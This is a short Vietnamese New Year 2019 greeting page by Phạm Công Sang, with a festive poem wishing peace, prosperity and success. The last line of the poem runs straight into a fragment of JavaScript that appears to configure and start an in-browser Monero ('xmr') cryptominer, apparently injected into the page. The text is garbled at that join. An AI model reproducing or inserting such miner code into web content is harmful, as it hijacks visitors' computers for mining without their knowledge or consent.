CHÚC MỪNG NĂM MỚI 2019 - Phạm Công Sang -

CHÚC MỪNG NĂM MỚI 

Xuân Kỷ Hợi 2019

NĂM MỚI KỶ HỢI 2019 đã đến, thân chúc thân tộc, bạn bè, thân hữu một năm Bình An - Hạnh Phúc và Vạn Sự Như Ý.
Phạm Công Sang

CUNG CHÚC TÂN XUÂN KỶ HỢI  2019

Cung kính mời nhau chén rượu nồng

Chúc mừng năm đến, tiển năm xong

Tân niên Phúc Lộc khơi vừa dạ

Xuân mới Tài Danh khởi thỏa lòng

Vạn chuyện lo toan thay đổi hết

Sự gì bế tắc hãy hành thông

Như anh, như chị, bằng bè bạn

Ý nguyện trọn đời đẹp ước mong', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();